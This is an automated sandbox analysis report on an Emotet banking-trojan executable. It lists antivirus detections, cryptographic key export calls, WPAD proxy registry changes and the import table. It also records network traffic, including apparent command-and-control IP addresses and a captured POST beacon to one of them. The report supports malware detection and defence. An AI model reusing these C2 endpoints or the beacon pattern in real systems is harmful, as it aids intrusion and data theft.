6.2
High risk

5f2544abea47667cec13be1a5d03da71c2741b7ba3d761cbb212d242e936ab82

6aeb6c7e9beaa10707a35386249df529.exe

Analysis duration

79s

Last analyzed

File size

468.0KB
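Static detection Dynamic detection AI SCORE=81 CLASSIC EMOTET GCST GENCIRC GENERICKDZ GENETIC HIGH CONFIDENCE KEPITENKPM POSSIBLE SMHPEMOTETTHD SUSGEN UMEM
Hawkeye engine
Not detected. No Hawkeye engine results available.
Static verdict
Antivirus engines
Engine Result Scan date Version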
McAfee Emotet-FRX!6AEB6C7E9BEA 20200901 6.0.6.653
Alibaba 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:Malware-gen 20200901 18.4.3895.0
Tencent Malware.Win32.Gencirc.10cdf97b 20200901 1.0.0.1
Kingsoft 20200901 2013.8.14.323
CrowdStrike 20190702 1.0
Static indicators
Queries for the computername (1 event)
Time & API Arguments Status Return Repeated
1620975754.57525
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (5 events)
Time & API Arguments Status Return Repeated
1620975744.84125
CryptGenKey
crypto_handle: 0x008b74b8
algorithm_identifier: 0x0000660e ()
provider_handle: 0x008b67d8
flags: 1
key: f á¨J؅¡!yÂhÍï¹
success 1 0
1620975754.60625
CryptExportKey
crypto_handle: 0x008b74b8
crypto_export_handle: 0x008b6798
buffer: f¤LTaw{g޳k,Jv‘ÀîzŽ™®óÙnÙEWç¡íð ʟõRÈq,ÿ,³þºI´ÃÂfÒª{DÄVFÕZŽˆe¶®†ã«1òõ%1Á¢þûù%ˆ%9âK<bÀŕ
blob_type: 1
flags: 64
success 1 0
1620975790.87225
CryptExportKey
crypto_handle: 0x008b74b8
crypto_export_handle: 0x008b6798
buffer: f¤ö0pO.ŠÑk6}|Åñ6€»øe”,®ÿڛ:É3‘m!\¾)§ö]nÁNdÛø>5 Lâ<5™ÝìwYÒmÜDœãW^»? opV¤ –÷«§6‰ €’8‘´¢'Ù ¶
blob_type: 1
flags: 64
success 1 0
1620975797.16925
CryptExportKey
crypto_handle: 0x008b74b8
crypto_export_handle: 0x008b6798
buffer: f¤ðvÞFffg¾ö!¶)UöIèûú™§þRk¿”Øê½OuSE“]CŸ:é'Lï8lºD³¾ك~<"‡£9šU£FO.$tcKҐÄ3aeã˽Ùo󑈑Cp&mUŠÅ
blob_type: 1
flags: 64
success 1 0
1620975800.13825
CryptExportKey
crypto_handle: 0x008b74b8
crypto_export_handle: 0x008b6798
buffer: f¤‚nðà -™K$#U\«gŠK'üLªö˅ÅÛ;‘O&klñËUÒ¢6{/‡¶©¦ñÞAè²;þ”ÆRÎÓV=,«¿·Õž¼–ž ”ÑގN‚ÈFFäêDs´
blob_type: 1
flags: 64
success 1 0
This executable has a PDB path (1 event)
pdb_path c:\Users\Mr.Anderson\Desktop\Vc++ 6.0\27.8.20\CMapEditorCtrl_Demo\Release\MapEd.pdb
The file contains an unknown PE resource name possibly indicative of a packer (1 event)
resource name None
Behavioral verdict
Dynamic indicators
Allocates read-write-execute memory (usually to unpack itself) (1 event)
Time & API Arguments Status Return Repeated
1620975744.04425
NtAllocateVirtualMemory
process_identifier: 2852
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00960000
success 0 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1620975755.13825
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 event)
process 6aeb6c7e9beaa10707a35386249df529.exe
Reads the systems User Agent and subsequently performs requests (1 event)
Time & API Arguments Status Return Repeated
1620975754.73125
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
Network communication
Communicates with host for which no DNS query was performed (5 events)
host 134.209.193.138
host 162.144.42.60
host 172.217.24.14
host 24.26.151.3
host 68.183.233.80
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 events)
Time & API Arguments Status Return Repeated
1620975757.71625
RegSetValueExA
key_handle: 0x000003c4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1620975757.71625
RegSetValueExA
key_handle: 0x000003c4
value: 0µ<'H×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1620975757.71625
RegSetValueExA
key_handle: 0x000003c4
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1620975757.71625
RegSetValueExW
key_handle: 0x000003c4
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1620975757.71625
RegSetValueExA
key_handle: 0x000003dc
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1620975757.71625
RegSetValueExA
key_handle: 0x000003dc
value: 0µ<'H×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1620975757.71625
RegSetValueExA
key_handle: 0x000003dc
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1620975757.74725
RegSetValueExW
key_handle: 0x000003c0
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)
Bkav W32.KepitenKPM.Trojan
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.69777
FireEye Generic.mg.6aeb6c7e9beaa107
McAfee Emotet-FRX!6AEB6C7E9BEA
K7AntiVirus Riskware ( 0040eff71 )
K7GW Riskware ( 0040eff71 )
Arcabit Trojan.Generic.D11091
TrendMicro Possible_SMHPEMOTETTHD
Cyren W32/Emotet.UMEM-1411
APEX Malicious
Avast Win32:Malware-gen
Kaspersky Trojan-Banker.Win32.Emotet.gcst
BitDefender Trojan.GenericKDZ.69777
ViRobot Trojan.Win32.Emotet.479232.B
Tencent Malware.Win32.Gencirc.10cdf97b
Ad-Aware Trojan.GenericKDZ.69777
DrWeb Trojan.Emotet.1005
VIPRE Trojan.Win32.Generic!BT
Sophos Troj/Emotet-CMB
Jiangmin Trojan.Banker.Emotet.ofx
Microsoft Trojan:Win32/Emotet.PED!MTB
ZoneAlarm Trojan-Banker.Win32.Emotet.gcst
GData Trojan.GenericKDZ.69777
AhnLab-V3 Malware/Win32.Generic.C4188538
ALYac Trojan.Agent.Emotet
MAX malware (ai score=81)
Malwarebytes Trojan.MalPack.TRE
ESET-NOD32 Win32/Emotet.CD
TrendMicro-HouseCall Possible_SMHPEMOTETTHD
Rising Trojan.Emotet!1.CB4A (CLASSIC)
Ikarus Trojan-Banker.Emotet
Fortinet W32/Emotet.E88D!tr
MaxSecure Trojan.Malware.105981096.susgen
AVG Win32:Malware-gen
Panda Trj/Genetic.gen
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (3 events)
dead_host 162.144.42.60:8080
dead_host 24.26.151.3:80
dead_host 192.168.56.101:49176
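Visual analysis
Binary image
No binary image. No binary visualization was generated for this sample.
Runtime screenshots
No runtime screenshots. No screenshots were generated while this sample ran.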


PE Compile Time

2020-08-28 01:08:15

Imports

Library KERNEL32.dll:
0x43d0f0 GetStartupInfoA
0x43d0f4 GetCommandLineA
0x43d0f8 HeapReAlloc
0x43d0fc TerminateProcess
0x43d100 HeapSize
0x43d10c GetCurrentProcessId
0x43d114 LCMapStringA
0x43d118 LCMapStringW
0x43d11c HeapDestroy
0x43d120 HeapCreate
0x43d124 VirtualFree
0x43d128 IsBadWritePtr
0x43d12c GetStdHandle
0x43d138 VirtualQuery
0x43d144 SetHandleCount
0x43d148 GetFileType
0x43d14c GetStringTypeA
0x43d150 GetStringTypeW
0x43d158 IsBadReadPtr
0x43d15c IsBadCodePtr
0x43d160 SetStdHandle
0x43d168 InterlockedExchange
0x43d16c GetSystemInfo
0x43d170 VirtualProtect
0x43d174 HeapFree
0x43d178 HeapAlloc
0x43d17c RtlUnwind
0x43d180 GetTickCount
0x43d184 GetFileTime
0x43d188 GetFileAttributesA
0x43d190 SetErrorMode
0x43d194 CreateFileA
0x43d198 GetFullPathNameA
0x43d1a0 FindFirstFileA
0x43d1a4 FindClose
0x43d1a8 GetCurrentProcess
0x43d1ac DuplicateHandle
0x43d1b0 GetFileSize
0x43d1b4 SetEndOfFile
0x43d1b8 UnlockFile
0x43d1bc LockFile
0x43d1c0 FlushFileBuffers
0x43d1c4 SetFilePointer
0x43d1c8 WriteFile
0x43d1cc ReadFile
0x43d1d8 RaiseException
0x43d1dc GetOEMCP
0x43d1e0 GetCPInfo
0x43d1e8 GlobalFlags
0x43d1ec TlsFree
0x43d1f4 LocalReAlloc
0x43d1f8 TlsSetValue
0x43d1fc TlsAlloc
0x43d204 TlsGetValue
0x43d20c GlobalHandle
0x43d210 GlobalReAlloc
0x43d218 LocalAlloc
0x43d21c CloseHandle
0x43d220 GetCurrentThread
0x43d224 lstrcmpA
0x43d228 GetModuleFileNameA
0x43d234 lstrcpyA
0x43d23c SetLastError
0x43d240 GlobalFree
0x43d244 MulDiv
0x43d248 GlobalAlloc
0x43d24c GlobalLock
0x43d250 GlobalUnlock
0x43d254 FormatMessageA
0x43d258 LocalFree
0x43d25c FreeResource
0x43d260 GetCurrentThreadId
0x43d264 GlobalGetAtomNameA
0x43d268 GlobalAddAtomA
0x43d26c GlobalFindAtomA
0x43d270 GlobalDeleteAtom
0x43d274 LoadLibraryA
0x43d278 FreeLibrary
0x43d27c lstrcatA
0x43d280 lstrcmpW
0x43d284 lstrcpynA
0x43d288 GetModuleHandleA
0x43d28c GetProcAddress
0x43d290 CompareStringW
0x43d294 CompareStringA
0x43d298 lstrlenA
0x43d29c lstrcmpiA
0x43d2a0 GetVersion
0x43d2a4 MultiByteToWideChar
0x43d2a8 VirtualAlloc
0x43d2ac GetLastError
0x43d2b0 ExitProcess
0x43d2b4 WideCharToMultiByte
0x43d2b8 FindResourceA
0x43d2bc LoadResource
0x43d2c0 LockResource
0x43d2c4 SizeofResource
0x43d2c8 GetVersionExA
0x43d2cc GetThreadLocale
0x43d2d0 GetLocaleInfoA
0x43d2d4 GetACP
Library USER32.dll:
0x43d334 GetDCEx
0x43d338 LockWindowUpdate
0x43d33c PostThreadMessageA
0x43d340 SetParent
0x43d344 SetRect
0x43d348 IsRectEmpty
0x43d34c CharNextA
0x43d350 ReleaseCapture
0x43d354 WindowFromPoint
0x43d358 SetCapture
0x43d35c DestroyMenu
0x43d360 wsprintfA
0x43d364 SetRectEmpty
0x43d368 IsZoomed
0x43d370 MapDialogRect
0x43d374 GetDesktopWindow
0x43d37c GetNextDlgTabItem
0x43d380 EndDialog
0x43d384 GetMessageA
0x43d388 TranslateMessage
0x43d38c GetActiveWindow
0x43d390 ValidateRect
0x43d394 SetCursor
0x43d398 PostQuitMessage
0x43d39c InflateRect
0x43d3a0 EndPaint
0x43d3a4 BeginPaint
0x43d3a8 GetWindowDC
0x43d3ac ClientToScreen
0x43d3b0 GrayStringA
0x43d3b4 DrawTextExA
0x43d3b8 DrawTextA
0x43d3bc TabbedTextOutA
0x43d3c0 SetMenuItemBitmaps
0x43d3c4 ModifyMenuA
0x43d3c8 GetMenuState
0x43d3cc EnableMenuItem
0x43d3d0 CheckMenuItem
0x43d3d8 IsWindowEnabled
0x43d3dc MoveWindow
0x43d3e0 SetWindowTextA
0x43d3e4 IsDialogMessageA
0x43d3e8 SetDlgItemInt
0x43d3ec GetDlgItemInt
0x43d3f4 GetCapture
0x43d3f8 SetWindowsHookExA
0x43d3fc CallNextHookEx
0x43d400 GetClassLongA
0x43d404 GetClassInfoExA
0x43d408 GetClassNameA
0x43d40c SetPropA
0x43d410 GetPropA
0x43d414 RemovePropA
0x43d418 SendDlgItemMessageA
0x43d41c GetFocus
0x43d420 IsWindow
0x43d424 SetFocus
0x43d428 IsChild
0x43d42c GetWindowTextA
0x43d430 GetForegroundWindow
0x43d434 GetLastActivePopup
0x43d438 SetActiveWindow
0x43d43c DispatchMessageA
0x43d440 BeginDeferWindowPos
0x43d444 EndDeferWindowPos
0x43d448 GetDlgItem
0x43d44c GetTopWindow
0x43d450 DestroyWindow
0x43d454 UnhookWindowsHookEx
0x43d458 GetMessageTime
0x43d45c GetMessagePos
0x43d460 PeekMessageA
0x43d464 MapWindowPoints
0x43d468 GetKeyState
0x43d46c DrawStateA
0x43d470 EqualRect
0x43d474 DrawFocusRect
0x43d478 GetClientRect
0x43d47c ScreenToClient
0x43d480 GetDC
0x43d484 ReleaseDC
0x43d488 EnableScrollBar
0x43d48c SetTimer
0x43d490 KillTimer
0x43d494 EnableWindow
0x43d498 LoadCursorA
0x43d49c GetCursorPos
0x43d4a0 GetScrollRange
0x43d4a4 SetScrollPos
0x43d4a8 GetScrollPos
0x43d4ac SetForegroundWindow
0x43d4b0 ShowScrollBar
0x43d4b4 IsWindowVisible
0x43d4b8 UpdateWindow
0x43d4bc GetMenu
0x43d4c0 PostMessageA
0x43d4c4 GetSubMenu
0x43d4c8 GetMenuItemID
0x43d4cc GetMenuItemCount
0x43d4d0 GetSysColor
0x43d4d4 AdjustWindowRectEx
0x43d4d8 GetParent
0x43d4dc DeferWindowPos
0x43d4e0 GetScrollInfo
0x43d4e4 SetScrollInfo
0x43d4e8 RegisterClassA
0x43d4ec UnregisterClassA
0x43d4f0 GetDlgCtrlID
0x43d4f4 CallWindowProcA
0x43d4f8 GetWindowLongA
0x43d4fc SetWindowLongA
0x43d500 SetWindowPos
0x43d504 MessageBeep
0x43d508 GetNextDlgGroupItem
0x43d50c InvalidateRgn
0x43d510 WinHelpA
0x43d518 GetSysColorBrush
0x43d51c DefWindowProcA
0x43d520 GetClassInfoA
0x43d524 DrawIcon
0x43d528 SendMessageA
0x43d52c IsIconic
0x43d530 InvalidateRect
0x43d534 LoadIconA
0x43d538 InSendMessage
0x43d53c CreateWindowExA
0x43d540 ShowWindow
0x43d544 GetSystemMetrics
0x43d548 MessageBoxA
0x43d54c LoadStringA
0x43d550 LoadBitmapA
0x43d554 CharUpperA
0x43d558 GetWindow
0x43d55c PtInRect
0x43d560 CopyRect
0x43d564 GetWindowRect
0x43d568 GetWindowPlacement
0x43d570 IntersectRect
0x43d574 OffsetRect
Library GDI32.dll:
0x43d034 SetRectRgn
0x43d038 CombineRgn
0x43d03c GetMapMode
0x43d040 PatBlt
0x43d044 GetTextMetricsA
0x43d04c GetTextColor
0x43d050 GetRgnBox
0x43d054 GetStockObject
0x43d058 CreatePatternBrush
0x43d05c DeleteDC
0x43d060 ExtSelectClipRgn
0x43d064 ScaleWindowExtEx
0x43d068 SetWindowExtEx
0x43d06c ScaleViewportExtEx
0x43d070 SetViewportExtEx
0x43d074 OffsetViewportOrgEx
0x43d078 SetViewportOrgEx
0x43d07c Escape
0x43d080 ExtTextOutA
0x43d084 TextOutA
0x43d088 RectVisible
0x43d08c GetBkColor
0x43d090 CreatePen
0x43d094 GetWindowExtEx
0x43d098 GetViewportExtEx
0x43d09c CreateRectRgn
0x43d0a0 SelectClipRgn
0x43d0a4 DeleteObject
0x43d0a8 IntersectClipRect
0x43d0ac ExcludeClipRect
0x43d0b0 SetMapMode
0x43d0b4 RestoreDC
0x43d0b8 SaveDC
0x43d0bc GetDeviceCaps
0x43d0c0 CreateBitmap
0x43d0c4 GetObjectA
0x43d0c8 SetBkColor
0x43d0cc SetTextColor
0x43d0d0 GetClipBox
0x43d0d4 BitBlt
0x43d0d8 Polyline
0x43d0dc SelectObject
0x43d0e0 CreateCompatibleDC
0x43d0e8 PtVisible
Library MSIMG32.dll:
0x43d2e0 TransparentBlt
Library comdlg32.dll:
0x43d58c GetFileTitleA
Library WINSPOOL.DRV:
0x43d57c OpenPrinterA
0x43d580 DocumentPropertiesA
0x43d584 ClosePrinter
Library ADVAPI32.dll:
0x43d000 RegOpenKeyA
0x43d004 RegQueryValueExA
0x43d008 RegOpenKeyExA
0x43d00c RegDeleteKeyA
0x43d010 RegEnumKeyA
0x43d014 RegQueryValueA
0x43d018 RegCreateKeyExA
0x43d01c RegSetValueExA
0x43d020 RegCloseKey
Library COMCTL32.dll:
0x43d028
Library SHLWAPI.dll:
0x43d31c PathFindFileNameA
0x43d320 PathStripToRootA
0x43d324 PathFindExtensionA
0x43d328 PathIsUNCA
Library oledlg.dll:
0x43d5d4
Library ole32.dll:
0x43d598 CoGetClassObject
0x43d59c CLSIDFromString
0x43d5a0 CLSIDFromProgID
0x43d5a8 CoTaskMemFree
0x43d5b0 OleUninitialize
0x43d5bc OleFlushClipboard
0x43d5c4 CoRevokeClassObject
0x43d5c8 CoTaskMemAlloc
0x43d5cc OleInitialize
Library OLEAUT32.dll:
0x43d2e8 VariantClear
0x43d2ec VariantChangeType
0x43d2f0 VariantInit
0x43d2f4 SysAllocStringLen
0x43d2f8 SysFreeString
0x43d2fc SysStringLen
0x43d304 VariantCopy
0x43d308 SafeArrayDestroy
0x43d310 SysAllocString

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49177 134.209.193.138 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 49713 114.114.114.114 53
192.168.56.101 50002 114.114.114.114 53
192.168.56.101 53237 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 60384 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 61680 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 62318 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 49238 239.255.255.250 1900

HTTP & HTTPS Requests

URI Data
http://134.209.193.138:443/Wrj8MM/
POST /Wrj8MM/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------------------6e880b484c0091854bf3b0967f7c20e4
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 134.209.193.138:443
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.